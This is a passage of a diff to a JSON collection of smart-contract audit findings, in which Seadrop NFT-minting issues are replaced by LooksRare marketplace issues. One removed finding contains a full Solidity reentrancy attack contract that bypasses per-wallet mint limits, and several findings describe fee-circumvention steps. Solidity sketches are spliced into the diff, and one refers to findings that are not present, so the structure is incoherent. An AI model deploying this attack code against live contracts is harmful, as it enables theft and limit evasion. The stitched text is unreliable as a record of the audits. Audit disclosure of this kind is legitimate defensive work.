updateAllowList updateDropURI updateSigner That means there should be some sort of off-chain trust established between these 2 entities.
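A simplified sketch consistent with the order-dependent behavior described in the two viewCreatorFeeInfo findings above (the loop shape is an assumption reconstructed from the described symptoms, not the audited source):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

interface IERC2981 {
    function royaltyInfo(uint256 tokenId, uint256 price) external view returns (address, uint256);
}

contract ViewCreatorFeeSketch {
    error BundleEIP2981NotAllowed(address collection);

    /// Reconstructed sketch: failed royaltyInfo calls are skipped, so `creator`
    /// can still be address(0) when a later successful call returns a nonzero
    /// creator, making the mismatch comparison revert for the [y, x] ordering.
    function viewCreatorFeeInfo(address collection, uint256 price, uint256[] calldata itemIds)
        external
        view
        returns (address creator, uint256 creatorFee)
    {
        for (uint256 i; i < itemIds.length; i++) {
            (bool status, bytes memory data) = collection.staticcall(
                abi.encodeCall(IERC2981.royaltyInfo, (itemIds[i], price))
            );
            if (!status) continue; // skipped item: `creator` keeps its previous value
            address newCreator;
            (newCreator, creatorFee) = abi.decode(data, (address, uint256));
            if (i == 0) {
                creator = newCreator;
            } else if (newCreator != creator) {
                revert BundleEIP2981NotAllowed(collection);
            }
        }
    }
}
```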
Otherwise, there are possible vectors of attack. Here is an example of how the owner can override AllowListData.merkleRoot and the other fields within AllowListData to generate proofs for any allowed SeaDrop's mintAllowList endpoint that would have MintParams.feeBps equal to 0: 1. The admin calls updateAllowList to set the Merkle root for this contract and emit ERC721SeaDrop.updateAllowList: SeaDrop.sol#L827 the other parameters as logs. for an allowed SeaDrop implementation The SeaDrop endpoint being called by 2. The owner calls updateAllowList but this time with new parameters, specifically a new Merkle root that is computed from leaves that have MintParams.feeBps == 0. 3. Users/minters use the generated proof corresponding to the latest allow list update and pass their mintParams.feeBps as 0. And thus avoiding the protocol fee deduction for the creatorPaymentAddress (SeaDrop.sol#L187-L194).", + "title": "Seller might get a lower fee than expected due to front-running", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "This protocol seems to have a fee structure where both the protocol and the original creator of the item charge fees, and these fees are subtracted from the seller's proceeds. This means that the seller, whether they are a maker or a taker, may receive a lower price than they expected due to sudden changes in creator or protocol fee rates.", "labels": [ "Spearbit", - "Seadrop", - "Severity: High Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Reentrancy of fee payment can be used to circumvent max mints per wallet check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "In case of a mintPublic call, the function _checkMintQuantity checks whether the minter has exceeded the parameter maxMintsPerWallet, among other things. However, re-entrancy in the above fee dispersal mechanism can be used to circumvent the check. The following is an example contract that can be employed by the feeRecipent (assume that maxMintsPerWallet is 1): 7 contract MaliciousRecipient { bool public startAttack; address public token; SeaDrop public seaDrop; fallback() external payable { if (startAttack) { startAttack = false; seaDrop.mintPublic{value: 1 ether}({ nftContract: token, feeRecipient: address(this), minterIfNotPayer: address(this), quantity: 1 }); } } // Call `attack` with at least 2 ether. function attack(SeaDrop _seaDrop, address _token) external payable { token = _token; seaDrop = _seaDrop; startAttack = true; _seaDrop.mintPublic{value: 1 ether}({ nftContract: _token, feeRecipient: address(this), minterIfNotPayer: address(this), quantity: 1 }); token = address(0); seaDrop = SeaDrop(address(0)); } } This is especially bad when the parameter PublicDrop.restrictFeeRecipients is set to false, in which case, anyone can circumvent the max mints check, making it a high severity issue. In the other case, only privileged users, i.e., should be part of _allowedFeeRecipients[nftContract] mapping, would be able to circumvent the check--lower severity due to needed privileged access. Also, creatorPaymentAddress can use re-entrancy to get around the same check.
See SeaDrop.sol#L571.", + "title": "StrategyManager does not emit an event when the first strategy gets added.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "StrategyManager does not emit an event when the first strategy gets added, which can cause issues for off-chain agents.", "labels": [ "Spearbit", - "Seadrop", - "Severity: High Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Cross SeaDrop reentrancy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The contract that implements IERC721SeaDrop can work with multiple Seadrop implementations, for example, a Seadrop that accepts ETH as payment as well as another Seadrop contract that accepts USDC as payment at the same time. This introduces the risk of cross contract re-entrancy that can be used to circumvent the maxMintsPerWallet check. Here's an example of the attack: 1. Consider an ERC721 token that that has two allowed SeaDrop, one that accepts ETH as payment and the other that accepts USDC as payment, both with public mints and restrictedFeeRecipients set to false. 2. Let maxMintPerWallet be 1 for both these cases. 3. A malicious fee receiver can now do the following: Call mintPublic for the Seadrop with ETH fees, which does the _checkMintQuantity check and trans- fers the fees in ETH to the receiver. The receiver now calls mintPublic for Seadrop with USDC fees, which does the _checkMintQuantity check that still passes. The mint succeeds in the Seadrop-USDC case. The mint succeeds in the Seadrop-ETH case. The minter has 2 NFTs even though it's capped at 1. Even if a re-entrancy lock is added in the SeaDrop, the same issue persists as it only enters each Seadrop contract once.", + "title": "TransferSelectorNFT does not emit events when new transfer managers are added in its constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "TransferSelectorNFT does not emit an event when assetTypes of 0 and 1 are added in its constructor.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Lack of replay protection for mintAllowList and mintSigned", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "merkle proofs) there are no checks that prevent re-using the same signature or Merkle proof multiple This is indirectly enforced by the _checkMintQuantity function that checks the mint statistics times. using exceeds maxMintsPerWallet. Replays can happen if a wallet does not claim all of maxMintsPerWallet in one transaction. For example, assume that maxMintsPerWallet is set to 2. A user can call mintSigned with a valid signature and quantity = 1 twice. IERC721SeaDrop(nftContract).getMintStats(minter) reverting quantity and the if Typically, contracts try to avoid any forms of signature replays, i.e., a signature can only be used once. This simpli- fies the security properties. In the current implementation of the ERC721Seadrop contract, we couldn't see a way to exploit replay protection to mint beyond what could be minted in a single initial transaction with the maximum value of quantity supplied.
However, this relies on the contract correctly implementing IERC721SeaDrop.getMintStats.", + "title": "Protocol fees will be sent to address(0) if protocolFeeRecipient is not set.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Protocol fees will be sent to address(0) if protocolFeeRecipient is not set.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "The digest in SeaDrop.mintSigned is not calculated correctly according to EIP-712", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "mintParams in the calculation of the digest in mintSigned is of struct type, so we would need to calculate and use its hashStruct , not the actual variable on its own.", + "title": "The returned price by strategies is not validated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "When a taker submits an order to be executed, the returned price by the maker's chosen strategy is not validated. The current strategies do have the validations implemented, but the general upper and lower bound price validation would need to be in the protocol contract itself since the price calculation in a potential strategy might be a complex matter that cannot be easily verified by a maker or a taker. Related issue: \"price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed\"", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "ERC721A has mint caps that are not checked by ERC721SeaDrop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "ERC721SeaDrop inherits from ERC721A which packs balance, numberMinted, numberBurned, and an extra data chunk in 1 storage slot (64 bits per substorage) for every address. This would add an inherent cap of 2**64 - 1 to all these different fields. Currently, there is no check in ERC721A's _mint for quantity nor in ERC721SeaDrop's mintSeaDrop function. Also, if we almost reach the max cap for a balance by an owner and someone else transfers a token to this owner, there would be an overflow for the balance and possibly the number of mints in the _packedAddressData. The overflow could possibly reduce the balance and the numberMinted to a way lower numer and numberBurned to a way higher number", + "title": "Makers can sign (or be tricked into signing) collection of orders (using the merkle tree mechanism) that cannot be entirely canceled.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "All user-facing order execution endpoints of the protocol check whether the order hash is included in the merkle tree data provided by the caller. If it is, the maker/signer is only required to sign the hash of the tree's root. A maker might sign (or get tricked into signing) a root that belongs to trees with a high number of leaves such that the leaves each encode an order with: a different subsetNonce and orderNonce (this would require canceling each nonce individually if the relevant endpoints are used), or
an askNonce or bidNonce that forms a consecutive array of integers (1, ..., n) (this would require incrementing these nonces at least n times, if this method was used as a way of canceling the orders). To cancel these orders, the maker would need to call the cancelOrderNonces, cancelSubsetNonces, or incrementBidAskNonces. If the tree has a high number of nodes, it might be infeasible to cancel all the orders due to gas costs. The maker would be forced to remove its token approvals (if it's not a custom EIP-1271 maker/signer) and not use that address again to interact with the protocol.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "ERC721SeaDrop owner can choose an address they control as the admin when the constructor is called.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The owner/creator can call the contract directly (skip using the UI) and set the administrator as themselves or another address that they can control. Then after they create a PublicDrop or TokenGatedDrop, they can call either updatePublicDropFee or updateTokenGatedDropFee and set the feeBps to zero or another number and also call the updateAllowedFeeRecipient to add the same or another address they control as a feeRecipient. This way they can circumvent the protocol fee.", + "title": "The ItemIdsRange strategy allows for length mismatch in itemIds and amounts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "There is no validation that takerAsk.itemIds.length == takerAsk.amounts.length in the ItemIdsRange strategy, despite takerAsk.itemIds and takerAsk.amounts being the return values of the executeStrategyWithTakerAsk function. If takerAsk.itemIds.length > takerAsk.amounts.length, then the transaction will revert anyway when it attempts to read an index out of bounds in the main loop. However, there is nothing causing a revert if takerAsk.itemIds.length < takerAsk.amounts.length, and any extra values in the takerAsk.amounts array will be ignored. Most likely this issue would be caught later on in any transaction, e.g. the current TransferManager implementation checks for length mismatches. However, this TransferManager is just one possible implementation that could be added to the TransferSelectorNFT contract, so this still could be an issue.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "ERC721SeaDrop's admin would need to set feeBps manually after/before creation of each drop by the owner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "When an owner of a ERC721SeaDrop token creates either a public or a token gated drop by calling updatePublicDrop or updateTokenGatedDrop, the PublicDrop.feeBps/TokenGatedDropStage.feeBps is initially set to 0. So the admin would need to set the feeBps parameter at some point (before or after).
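A fragment-style sketch of the missing length validation flagged in the ItemIdsRange finding above, in the same style as the snippets quoted in this review (the exact integration point is an assumption):

```solidity
// Assumed validation sketch: require the arrays returned for the taker side
// to have matching lengths before they are consumed downstream.
if (takerAsk.itemIds.length != takerAsk.amounts.length) {
    revert OrderInvalid();
}
```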
Forgetting to set this parameter results in not receiving the protocol fees.", + "title": "Spec mismatch - StrategyCollectionOffer allows only single item orders where the spec states it should allow any amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof only allow the transfer of a single ERC721/ERC1155 item, although the specification states it should support any amount.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "owner can reset feeBps set by admin for token gated drops", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Only the admin can call updateTokenGatedDropFee to update feeBps. However, the owner can call updateTokenGatedDrop(address seaDropImpl, address allowedNftToken, TokenGatedDropStage calldata drop- Stage) twice after that to reset the feeBps to 0 for a drop. 1. Once with dropStage.maxTotalMintableByWallet equal to 0 to wipe out the storage on the SeaDrop side. 2. Then with the same allowedNftToken address and the other desired parameters, which would retrieve the previously wiped out drop stage data (with feeBps equal to 0). NOTE: This type of attack does not apply to updatePublicDrop and updatePublicDropFee pair. Since updatePub- licDrop cannot remove or update the feeBps. Once updatePublicDropFee is called with a specific feeBps that value remains for this ERC721SeaDrop contract-related storage on SeaDrop (_publicDrops[msg.sender] = pub- licDrop). And any number of consecutive calls to updatePublicDrop with any parameters cannot change the already set feeBps.", + "title": "Owner of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add malicious price feeds after they have been added to LooksRareProtocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Owner of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add malicious price feeds for new collections after they have been added to LooksRareProtocol. It's also important to note that these strategy owners might not necessarily be the same owner as the LooksRareProtocol's. 1. LooksRareProtocol's O_L adds strategy S. 2. Strategy's owner O_S adds a malicious price feed for a new collection T.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Medium Risk" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Update the start token id for ERC721SeaDrop to 1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "ERC721SeaDrop's mintSeaDrop uses _mint from ERC721A library which starts the token ids for minting from 0. /// contracts/ERC721A.sol#L154-L156 /** * @dev Returns the starting token ID. * To change the starting token ID, please override this function.
*/ function _startTokenId() internal view virtual returns (uint256) { return 0; }", + "title": "The price calculation in StrategyDutchAuction can be more accurate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "StrategyDutchAuction calculates the auction price as uint256 duration = makerAsk.endTime - makerAsk.startTime; uint256 decayPerSecond = (startPrice - makerAsk.minPrice) / duration; uint256 elapsedTime = block.timestamp - makerAsk.startTime; price = startPrice - elapsedTime * decayPerSecond; One of the shortcomings of the above calculation is that division comes before multiplication, which can amplify the rounding error introduced by the division (a multiplication-first variant is sketched below).", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Low Risk" ] }, { - "title": "Update the ERC721A library due to an unpadded toString() function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The audit repo uses ERC721A at dca00fffdc8978ef517fa2bb6a5a776b544c002a which does not add a trailing zero padding to the returned string. Some projects have had issues reusing the toString() where the off-chain call returned some dirty-bits at the end (similar to Seaport 1.0's name()).", + "title": "Incorrect isMakerBidValid logic in ItemIdsRange execution strategy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "If an ItemIdsRange order has makerBid.itemIds[0] == 0, it is treated as invalid by the corresponding isMakerBidValid function. Since makerBid.itemIds[0] is the minItemId value, and since many NFT collections contain NFTs with id 0, this is incorrect (and does not match the logic of the ItemIdsRange executeStrategyWithTakerAsk function). As a consequence, frontends that filter orders based on the isMakerBidValid function will ignore certain orders, even though they are valid.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Low Risk" ] }, { - "title": "Warn contracts implementing IERC721SeaDrop to revert on quantity == 0 case", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "There are no checks in Seadrop that prevents minting for the case when quantity == 0. This would call the function mintSeadrop(minter, quantity) for a contract implementing IERC721SeaDrop with quantity == 0. It is up to the implementing contract to revert in such cases. The ERC721A library reverts when quantity == 0--the correct behaviour. However, there has been instances in the past where ignoring quantity == 0 checks have led to security issues.", + "title": "Restructure struct definitions in OrderStructs in a more optimized format", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Maker and taker ask and bid structs include the fields itemIds and amounts. For most strategies, these two arrays are supposed to have the same length (except for StrategyItemIdsRange). Even for StrategyItemIdsRange one can either: relax the requirement that makerBid.amounts.length == 1 (replacing it by requiring the amounts and itemIds lengths to equal 2) by allowing an unused extra amount, or not use makerBid.amounts and makerBid.itemIds and instead grab those 3 parameters from the additionalParameters field.
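As referenced in the StrategyDutchAuction finding above, performing the multiplication before the division avoids the precision loss of a truncated decayPerSecond. A fragment-style sketch of that reordering, using the same variables as the quoted snippet (the surrounding function is assumed):

```solidity
// Sketch: compute the total decay in one expression so the division by
// `duration` happens last, avoiding the truncation of decayPerSecond.
uint256 duration = makerAsk.endTime - makerAsk.startTime;
uint256 elapsedTime = block.timestamp - makerAsk.startTime;
price = startPrice - (elapsedTime * (startPrice - makerAsk.minPrice)) / duration;
```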
This might actually make more sense since in the case of StrategyItemIdsRange, the itemIds and amounts carry information that deviates from what they are intended to be used for.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk" + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "Missing parameter in _SIGNED_MINT_TYPEHASH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "A parameter is missing (uint256 maxTokenSupplyForStage) and got caught after reformatting.", + "title": "if/else block in executeMultipleTakerBids can be simplified/optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The if/else block in executeMultipleTakerBids can be simplified/optimized by using the continue keyword and placing the else's body in the outer scope. // If atomic, it uses the executeTakerBid function, if not atomic, it uses a catch/revert pattern with external function if (isAtomic) { // Execute the transaction and add protocol fee totalProtocolFeeAmount += _executeTakerBid(takerBid, makerAsk, msg.sender, orderHash); unchecked { ++i; } continue; } try this.restrictedExecuteTakerBid(takerBid, makerAsk, msg.sender, orderHash) returns ( uint256 protocolFeeAmount ) { totalProtocolFeeAmount += protocolFeeAmount; } catch {} unchecked { ++i; } testThreeTakerBidsERC721OneFails() (gas: -24 (-0.002%)) Overall gas change: -24 (-0.002%) LooksRare: Fixed in PR 323. Spearbit: Verified.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk" + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "Missing address(0) check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "All update functions having an address as an argument check them against address(0). This is missing in updateTokenGatedDrop.
This is also not protected in ERC721SeaDrop.sol#updateTokenGatedDrop(), so address(0) could pass as a valid value.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk SeaDrop.sol#L856, SeaDrop.sol#L907-L909, SeaDrop.sol#L927-L929, SeaDrop.sol#L966-L968," + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "Missing boundary checks on feeBps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "There's a missing check when setting feeBps from ERC721SeaDrop.sol while one exists when the value is used at a later stage in Seadrop.sol, which could cause a InvalidFeeBps error.", + "title": "Cache currency in executeTakerAsk and executeTakerBid", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "currency is read multiple times from calldata in executeTakerAsk and executeTakerBid.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk" + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "Upgrade openzeppelin/contracts's version", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "There are known vulnerabilities in the current @openzeppelin/contracts version used. This affects SeaDrop.sol with a potential Improper Verification of Cryptographic Signature vulnerability as ECDSA.recover is used.", + "title": "Cache operators[i] in grantApprovals and revokeApprovals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "operators[i] is used 3 times in grantApprovals's for loop (and twice in revokeApprovals's).", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk" + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "struct TokenGatedDropStage is expected to fit into 1 storage slot", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "struct TokenGatedDropStage is expected to be tightly packed into 1 storage slot, as per announced in its @notice tag. However, the struct actually takes 2 slots. This is unexpected, as only one slot is loaded in the dropStageExists assembly check.", + "title": "recipients[0] is never used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "recipients[0] is set to protocolFeeRecipient, but its value is never used afterward. In payProtocolFeeAndAffiliateFee, the fees[0] amount is manually distributed to an affiliate (if any) and the protocolFeeRecipient.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Low Risk" + "LooksRare", + "Severity: Gas Optimization" ] }, { - "title": "Avoid expensive iterations on removal of list elements by providing the index of element to be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Iterating through an array (address[] storage enumeration) to find the desired element (address toRemove) can be an expensive operation. Instead, it would be best to also provide the index to be removed along with the other parameters to avoid looping over all elements. Also note in the case of _removeFromEnumeration(signer, enumeratedStorage), hopefully, there wouldn't be too many signers corresponding to a contract. So practically, this wouldn't be an issue. But something to note. Although the owner or admin can stuff the signer list with a lot of signers as the other person would not be able to remove from the list (DoS attack). For example, if the owner has stuffed the signer list with malicious signers, the admin would not be able to remove them.", + "title": "currency validation can be optimized/refactored", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the context above, we are enforcing only native tokens or WETH to be supplied.
The if statement can be simplified and refactored into a utility function (possibly defined in either BaseStrategy or in BaseStrategyChainlinkPriceLatency): if (makerAsk.currency != address(0)) { if (makerAsk.currency != WETH) { revert WrongCurrency(); } }", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Gas Optimization" ] }, { - "title": "mintParams.allowedNftToken should be cached", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "mintParams.allowedNftToken is accessed several times in the mintAllowedTokenHolder function. It would be cheaper to cache it: // Put the allowedNftToken on the stack for more efficient access. address allowedNftToken = mintParams.allowedNftToken;", + "title": "validating amount can be simplified and possibly refactored", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the context above, we are trying to invalidate orders that have 0 amounts or an amount other than 1 when the asset is an ERC721: if (amount != 1) { if (amount == 0) { revert OrderInvalid(); } if (assetType == 0) { revert OrderInvalid(); } } The above snippet can be simplified into: if (amount == 0 || (amount != 1 && assetType == 0)) { revert OrderInvalid(); }", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Gas Optimization" ] }, { - "title": "Immutables which are calculated using keccak256 of a string literal can be made constant.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Since Solidity 0.6.12, keccak256 expressions are evaluated at compile-time: Code Generator: Evaluate keccak256 of string literals at compile-time. The suggestion of marking these expressions as immutable to save gas isn't true for compiler versions >= 0.6.12. As a reminder, before that, the occurrences of constant keccak256 expressions were replaced by the expressions instead of the computed values, which added a computation cost.", + "title": "_verifyMatchingItemIdsAndAmountsAndPrice can be further optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "_verifyMatchingItemIdsAndAmountsAndPrice's validation logic uses more opcodes than is necessary. Also, the whole function can be turned into an assembly block to further optimize this function.
Examples of simplifications for if conditions or(X, gt(Y, 0)) or(X, Y) // simplified version or(X, iszero(eq(Y,Z))) or(X, xor(Y, Z)) // simplified version The nested if block below if (amount != 1) { if (amount == 0) { revert OrderInvalid(); } if (assetType == 0) { revert OrderInvalid(); } } can be simplified into if (amount == 0) { revert OrderInvalid(); } if ((amount != 1) && (assetType == 0)) { revert OrderInvalid(); }", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Gas Optimization" ] }, { - "title": "Combine a pair of mapping to a list and mapping to a mapping into mapping to a linked-list", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "SeaDrop uses 3 pairs of mapping to a list and mapping to a mapping that can be combined into just one mapping. The pairs: 1. _allowedFeeRecipients and _enumeratedFeeRecipients 2. _signers and _enumeratedSigners 3. _tokenGatedDrops and _enumeratedTokenGatedTokens Here we have variables that come in pairs. One variable is used for data retrievals (a flag or a custom struct) and the other for iteration/enumeration.
mapping(address => mapping(address => CustomStructOrBool)) private variable; mapping(address => address[]) private _enumeratedVariable;", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": "The onlyAllowedSeaDrop modifier is redundant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The onlyAllowedSeaDrop modifier is always used next to another one (onlyOwner, onlyAdminis- trator or onlyOwnerOrAdministrator). As the owner, which is the least privileged role, already has the privilege to update the allowed SeaDrop registry list for this contract (by calling updateAllowedSeaDrop), this makes this second modifier redundant.", + "title": "In StrategyFloorFromChainlink premium amounts miss the related checks when compared to checks for discount amounts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "For discount amounts, StrategyFloorFromChainlink has custom checks for the underflows (even though they will be caught by the compiler): if (floorPrice <= discountAmount) { revert DiscountGreaterThanFloorPrice(); } uint256 desiredPrice = floorPrice - discountAmount; ... // @dev Discount cannot be 100% if (discount >= 10_000) { revert OrderInvalid(); } uint256 desiredPrice = (floorPrice * (10_000 - discount)) / 10_000; Similar checks for overflows for the premium are missing in the execution and validation endpoints (even though they will be caught by the compiler, floorPrice + premium or 10_000 + premium might overflow).", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop in ERC721SeaDrop to save storage and gas.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop into just one variable using a cyclic linked-list data structure. This would reduce storage space and save gas when storing or retrieving parameters.", + "title": "StrategyFloorFromChainlink's isMakerBidValid compares the time-dependent floorPrice to a fixed discount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "When isMakerBidValid gets called, depending on the market conditions at that specific time, the comparisons between the floorPrice and the discount might cause this function to return isValid as either true or false.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": ".length should not be looked up in every loop of a for-loop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Reading an array's length at each iteration of a loop consumes more gas than necessary.", + "title": "StrategyFloorFromChainlink's isMakerAskValid does not validate makerAsk.additionalParameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid, the maker needs to make sure to populate its additionalParameters with the premium amount, otherwise the taker's transactions would revert: makerAsk.additionalParameters = abi.encode(premium); isMakerAskValid does not check whether makerAsk.additionalParameters has 32 as its length. For example, the validation endpoint for StrategyCollectionOffer does check this for the merkle root.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": "A storage pointer should be cached instead of computed multiple times", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Caching a mapping's value in a local storage variable when the value is accessed multiple times saves gas due to not having to perform the same offset calculation every time.", + "title": "StrategyFloorFromChainlink strategies do not check for asset types explicitly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "StrategyFloorFromChainlink has 4 different execution endpoints: executeFixedPremiumStrategyWithTakerBid executeBasisPointsPremiumStrategyWithTakerBid executeFixedDiscountCollectionOfferStrategyWithTakerAsk executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk All these endpoints require that only one amount be passed (asked for or bid on) and that amount would need to be 1. This is in contrast to StrategyCollectionOffer strategy that allows an arbitrary amount (although also required to be only one amount, [a]) Currently, Chainlink only provides price feeds for a selected list of ERC721 collections: https://docs.chain.link/data-feeds/nft-floor-price/addresses So, if there are no price feeds for ERC1155 (as of now), the transaction would revert.
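A fragment-style sketch of the additionalParameters length check suggested in the isMakerAskValid finding above (the placement inside isMakerAskValid and its (bool, bytes4) return convention are assumptions):

```solidity
// Assumed placement inside isMakerAskValid: a premium encoded with
// abi.encode(premium) must be exactly 32 bytes long.
if (makerAsk.additionalParameters.length != 32) {
    return (false, OrderInvalid.selector);
}
```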
